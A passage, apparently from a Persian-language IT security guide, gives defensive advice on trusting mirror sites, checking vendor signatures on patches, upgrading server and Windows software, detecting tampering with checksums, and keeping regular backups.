ﻣﻲﺁﻳﻨﺪ .ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻲ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﺍﺭﺗﺒﺎﻁ ﺳﺮﻳﻊ ﻭ ﺑﺎ ﭘﺎﻳﮕـﺎﻩ ﺍﺻـﻠﻲ ﺍﺭﺗﺒـﺎﻁ ﻛﻨـﺪ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﭼﻨﺪ ﻧﮕﺮﺍﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ:
ﺭﺍﻫﺒﺮﺍﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﻛﻨﺘﺮﻝ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺧـﺮﺍﺏ ﻛﻨﻨـﺪ ،ﺑـﺎ •
ﻳﻚ ﻧﺴﺨﺔ ﺁﻟﻮﺩﻩ ﺑﻪ ﺗﺮﺍﻭﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻨﺪ ،ﻭ . ...ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺷﻤﺎ ﻧﻪﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺑﻪ ﻓﺮﻭﺷﻨﺪﻩ ﺍﻋﺘﻤﺎﺩ ﻛﻨﻴﺪ ،ﺑﻠﻜـﻪ ﺑﺎﻳـﺪ ﺑـﻪ ﺭﺍﻫﺒـﺮﺍﻥ
ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﻧﻴﺰ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﻩ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺁﻧﺮﺍ ﻧﻴﺰ ﻣﻨﺘﺸﺮ ﻛﻨﺪ )ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ
PGPﺑﻪ ﻫﻤﺮﺍﻩ ﺁﺭﺷﻴﻮﻫﺎﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ،ﺍﻣﻀﺎﻫﺎﻱ gnupgﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ،rpmﻳﺎ ﺍﻣﻀﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ (ActiveXﭼـﻮﻥ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ
ﻓﺮﻭﺷﻨﺪﻩ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺍﻭ ﻭ ﻧﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﺑﺪﺳﺖ ﺑﻴﺎﻭﺭﻳﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻴﺸﺘﺮ ﻣﻄﻤﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﻛـﻪ
ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻫﻤﺎﻥ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﺓ ﺍﺻﻠﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ .ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﭘـﻴﺶ ﺍﺯ
ﺍﻋﻤﺎﻝ ﺍﺻﻼﺣﻬﺎ ،ﺍﻣﻀﺎﻫﺎﻱ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ.
ﺣﺘﻲ ﺍﮔﺮ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﮑﺎﺳﻲ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﻤﺎ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ •
ﻛﺎﻓﻲ ﺳﺮﻳﻊ ﻧﺒﺎﺷﺪ .ﺍﮔﺮ ﻳﻚ ﺍﺻﻼﺡ ﺍﻣﻨﻴﺘﻲ ﺧﻴﻠﻲ ﻣﻬﻢ ﻣﻨﺘﺸﺮ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺘﻮﺍﻧﻴﺪ ۲۴ﺳﺎﻋﺖ ﺻﺒﺮ ﻛﻨﻴﺪ ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ
ﻣﺤﻞ ﺷﻤﺎ ﺑﻪﺭﻭﺯ ﮔﺮﺩﺩ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺭﺍﻫﻲ ﺟﺰ downloadﻛﺮﺩﻥ ﺍﺻﻼﺣﻬﺎ ﺑﻄﻮﺭ ﻣـﺴﺘﻘﻴﻢ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻓﺮﻭﺷـﻨﺪﺓ ﺍﺻـﻠﻲ ﻭﺟـﻮﺩ
ﻧﺪﺍﺭﺩ.
ﺩﺭ ﺍﻋﻤﺎﻝ ﺍﺻﻼﺣﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻭ ﺑﻮﻟﺘﻨﻬﺎﻱ ﻋﻤﻮﻣﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ .ﺩﺭ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻟﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ
ﺍﺻﻼﺣﻬﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﻓﺮﺍﺩ ﺭﺍ ﻓﺮﻳﺐ ﺩﻫﻨﺪ ﺗﺎ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺟﺪﻳﺪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻧﺼﺐ ﻛﻨﻨـﺪ ،ﻭ ﺩﺭ ﺑﻬﺘـﺮﻳﻦ
ﻻ ﺑﻮﺳﻴﻠﻪ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺑﻲﺗﺠﺮﺑﻪﺍﻱ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺭﺍﻩﺣـﻞ
ﺣﺎﻟﺖ ﻣﻌﻤﻮ ﹰ
ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ﺍﺻﻼﺡ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ،ﺑﻪ ﺁﻥ ﺁﺳﻴﺐ ﺑﺮﺳﺎﻧﺪ.
%
ﺍﮔﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺭﺍ ﺍﺭﺗﻘﺎ ﻣﻲﺩﻫﻴﺪ ،ﺑﺎﻳﺪ ﻓﺮﺍﻳﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﻣﺘﻮﻗﻒ ﺳﺎﺯﻳﺪ ﻭ ﺁﻧﺮﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻜﺎﺭ ﺍﻧﺪﺍﺯﻳﺪ ﺗـﺎ ﻧـﺴﺨﻪﺍﻱ
ﮐﻪ ﺗﺎﺯﻩ ﻧﺼﺐﺷﺪﻩ ،ﺍﺟﺮﺍ ﺷﻮﺩ -ﺗﻌﻮﻳﺾ ﺻﺮﻑ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﺮﺍﻱ ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻥ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺑﺎ ﻧـﺴﺨﺔ
ﻗﺪﻳﻤﻲ ﻛﻔﺎﻳﺖ ﻧﻤﻲﻛﻨﺪ.
ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ Windowsﻛﻤﻲ ﻧﺎﻣﺘﻌﺎﺭﻑﺗﺮ ﺍﺳـﺖ .ﺍﮔـﺮ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻳﻜـﻲ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻫﺴﺘﻪﺍﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ -ﻣﺎﻧﻨﺪ Internet Explorerﻳﺎ - Media Playerﺑﺎﺷﻨﺪ ،ﺑﻪﺭﻭﺯﺭﺳﺎﻥ WindowsUpdateﺍﺩﺍﺭﺓ ﺁﻧﺮﺍ ﺑﺮ
ﻋﻬﺪﻩ ﻣﻲﮔﻴﺮﺩ؛ ﺍﻣﺎ ﻫﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﻳﮕﺮﻱ ﺑﺎﻳﺪ ﺭﻭﺵ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ ﺍﺭﺍﺋﻪ ﻛﻨﺪ .ﺑﻌﻀﻲﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﻣﺠﺒﻮﺭ ﻛﻨﻨـﺪ ﻛـﻪ ﻧـﺴﺨﺔ
ﻗﺪﻳﻤﻲﺗﺮ ﺭﺍ uninstallﻛﻨﻴﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺁﻥ ﺍﺳﺖ ﮐﻪ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ ،ﺑﺮﺍﻱ ﺑﻌﻀﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛـﺎﻓﻲ
ﺑﺎﺷﺪ ﻛﻪ ﻧﺴﺨﻪ ﺟﺪﻳﺪ ﺭﺍ ﺭﻭﻱ ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲ ﻧﺼﺐ ﻛﻨﻴﺪ ،ﻭ ﺳﺎﻳﺮﻳﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻧﺪ ﺍﺭﺗﻘﺎﻱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺑﺮﻧﺎﻣﻪ-
ﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ( .ﺷﻤﺎ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﻪ ﺭﻭﺵ ﻣﺨﺼﻮﺹ ﺁﻥ ﻋﻤﻞ ﻛﻨﻴﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٠٦
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ
ﺑﺮﺍﻱ ﻣﺒﺎﺭﺯﻩ ﺑﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﭼﻨﺪﻳﻦ ﺭﺍﻩ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻋﻼﻭﻩ ﺑﺮ ﻣﺮﺍﻗﺒﺖ ﺩﺭ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺍﺧﺘﻴـﺎﺭﺍﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻓﺎﻳﻠﻬـﺎ ،ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ
ﻣﻬﻤﻲ ﻛﻪ ﺩﻳﺮ ﺑﻪ ﺩﻳﺮ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻓﻘﻂ-ﺧﻮﺍﻧﺪﻧﻲ ١١٥ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ .ﻓﺎﻳﻠﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ
ﺷﻮﻧﺪ ﺗﺎ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬﺎ ﺑﻪ ﮔﺬﺭ ﺍﺯ ﻣﺮﺍﺣﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺑﺎﺷﺪ) .ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﺎﺭ ،ﻫﻤﭽﻨﺎﻥ ﺣﺬﻑ ﻳﺎ ﺧـﺮﺍﺏ
ﻛﺮﺩﻥ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ(.
ﻫﻤﭽﻨﻴﻦ ﺷﻴﻮﻩﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺁﺷﻜﺎﺭ ﻛﺮﺩﻥ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻮﭼﻜﺘﺮ ﻳﺎ ﻫﻨﮕﺎﻣﻴﮑﻪ ﺗﻌﺪﺍﺩ ﻓﺎﻳﻠﻬﺎﻱ ﻛﻠﻴﺪﻱ ﻛﻪ
ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﻣﺤﻔﺎﻇﺖ ﺷﻮﺩ ﻣﺤﺪﻭﺩ ﺍﺳﺖ ،ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻓﻘﻂ-ﻧﻮﺷﺘﻨﻲ ١١٦ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻣـﺆﺛﺮﻱ ﺑﺎﺷـﺪ.
ﻓﺎﻳﻠﻬﺎ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺎ ﻫﻤﺘﺎﻫﺎﻱ ﺁﺭﺷﻴﻮﺷﺪﺓ ﺧﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﮔﺮ ﻳﻚ ﻓﺎﻳﻞ ﺧﺮﺍﺏ ﺷﺪ ،ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﺍﺣﻴﺎﻱ ﺁﻥ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ،ﻭ ﻭﻗﺘﻲ ﻳﻚ ﺗﻐﻴﻴﺮ ﻣﺠﺎﺯ ﺑﻪ ﻓﺎﻳﻞ ﺩﺍﺩﻩ ﺷﻮﺩ ،ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﺑﺎ ﺁﻥ ﻫﻤﺎﻫﻨﮓ ﻣﻲﮔﺮﺩﺩ.
ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﺓ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ offlineﻣﺤﺎﺳﺒﻪ ﻭ ﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺗﺤﺖ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ.
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﮔﻔﺘﻪ ﺷﺪ ﻳﻚ ﻭﻳﮋﮔﻲ ﻣﻬﻢ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﻓﺎﻳﻞ ﺟﺪﻳﺪﻱ ﺗﻮﻟﻴﺪ ﻛﺮﺩ ﻛﻪ ﺧﻼﺻﺔ ﺁﻥ ﺑـﺎ
ﺧﻼﺻﺔ ﻣﺤﺎﺳﺒﻪ ﺷﺪﻩ ﺗﻄﺒﻴﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻋﻤﻠﻜﺮﺩﻱ ﻣـﺸﺎﺑﻪ -ﻛـﻪ ﺍﻏﻠـﺐ inoculation
ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ -ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺁﻧﺠﺎ ﻛﻪ ﺳﺮﺟﻤﻌﻬﺎ ﻭﺍﺭﺩ ﻓﺎﻳﻠﻬـﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﻣـﻲﺷـﻮﻧﺪ .ﺩﺭ ﻓـﺼﻞ ﭘـﻨﺠﻢ ﺩﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ
ﻣﻘﺎﻳﺴﻪﺍﻱ ﻭ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺑﺮﺍﻱ ﻣﻤﻴﺰﻱ ﻣﺪﺍﻭﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﺤﺚ ﻣﻔﺼﻠﺘﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ.
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ
ﻻ ﻋﻠﻴﺮﻏﻢ ﺑﻬﺘﺮﻳﻦ ﺗﻼﺷﻬﺎ ﻧﻤﻲﺗـﻮﺍﻥ ﺍﺯ ﻭﻗـﻮﻉ ﻧﻘﺼﻬﺎ ،ﺣﻮﺍﺩﺙ ،ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ،ﻭ ﺣﻤﻼﺕ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﭘﻴﺶﺑﻴﻨﻲ ﻛﺮﺩ ﻭ ﻣﻌﻤﻮ ﹰ
ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﻮﺩ؛ ﺍﻣﺎ ﺍﮔﺮ ﭘﻴﺸﺘﻴﺒﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺗﺮﻣﻴﻢ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑﻪ ﻳﻚ ﻭﺿﻌﻴﺖ ﭘﺎﻳﺪﺍﺭ ﺑﺮﺳﺎﻧﻴﺪ .ﺣﺘـﻲ ﺍﮔـﺮ
ﻼ ﺑﻪ ﻋﻠﺖ ﺁﺗﺶﺳﻮﺯﻱ -ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ ،ﺑﺎ ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻛﺎﻣﻞ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑﻌـﺪ ﺍﺯ ﺧﺮﻳـﺪ ﺩﺳـﺘﮕﺎﻩ ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ -ﻣﺜ ﹰ
ﺟﺎﻳﮕﺰﻳﻦ ،ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ .ﻫﺰﻳﻨﺔ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻭ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺟﺪﻳﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳـﻂ ﺷـﺮﻛﺖ ﺑﻴﻤـﻪ ﺗـﺄﻣﻴﻦ ﺷـﻮﺩ ،ﺍﻣـﺎ
ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﭼﻴﺰﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﻻ ﺑﺪﻭﻥ ﺩﻟﻴـﻞ ﻣﺸﺨـﺼﻲ ﺧـﺮﺍﺏ ﻣـﻲﺷـﺪ ﻭ ﺳﺎﻟﻬﺎ ﻗﺒﻞ ،ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺭﻭﺯﺍﻧﻪ ﻛﺎﺭﻱ ﻣﺮﺳﻮﻡ ﺷﺪﻩ ﺑﻮﺩ ،ﭼﻮﻥ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺭﺍﻳﺎﻧﻪ ﻣﻌﻤﻮ ﹰ
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻨﻬﺎ ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺩﺍﺩﻩ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ .ﺍﻣﺮﻭﺯ ﻫﻢ ﺧﺮﺍﺑﻲ ﺳﺨﺖﺍﻓـﺰﺍﺭ ﻫﻨـﻮﺯ ﺩﻟﻴـﻞ ﺧـﻮﺑﻲ ﺑـﺮﺍﻱ ﺗﻬﻴـﻪ
ﻼ ﺗﺼﺎﺩﻓﻲ ﺍﺳﺖ ،ﭼﺮﺍﮐﻪ ﺣﺘﻲ ﺍﮔﺮ ﻳﻚ ﺩﻳﺴﻚ ﺳﺨﺖ ﺧﻮﺏ ﺑﻄـﻮﺭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ .ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﺩﻳﺴﮏ ﺳﺨﺖ ﻛﺎﻣ ﹰ
ﻣﺘﻮﺳﻂ ۵ﺳﺎﻝ ﻳﺎ ﻛﻤﻲ ﺑﻴﺸﺘﺮ ﻋﻤﺮ ﻛﻨﺪ ،ﺳﺎﺯﻣﺎﻧﻲ ﺑﺎ ﺣﺪﻭﺩ ۲۰ﺗﺎ ۳۰ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﺎﻳﺪ ﺩﺭ ﻫـﺮ ﭼﻨـﺪ ﻣـﺎﻩ ﻣﻨﺘﻈـﺮ ﻳـﻚ ﺧﺮﺍﺑـﻲ ﻗﺎﺑـﻞ
ﻻ ﺑﺪﻭﻥ ﻫﺸﺪﺍﺭ ﻗﺒﻠﻲ ﺧﺮﺍﺏ ﻣﻲﺷﻮﻧﺪ -ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺗﻨﻬﺎ ﭼﻨﺪ ﺭﻭﺯ ﺑﻌﺪ ﺍﺯ ﺁﻧﻜﻪ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣﻼﺣﻈﻪ ﺑﺎﺷﺪ .ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﻣﻌﻤﻮ ﹰ
ﮔﺮﻓﺘﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛﺎﺭ ﻋﻘﻼﻧﻲ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻢ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺍﺳﺖ.
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺑﺰﺍﺭ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺑﺎﺷﻨﺪ .ﺑﺨﺼﻮﺹ ،ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ
ﻣﻲﺩﻫﺪ ﺑﺎ ﻣﻘﺎﻳﺴﺔ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻥ ،ﺁﻧﭽﻪ ﺭﺍ ﻣﻬﺎﺟﻢ ﻋﻮﺽ ﻛﺮﺩﻩ ﺑﻴﺎﺑﻴﺪ .ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ
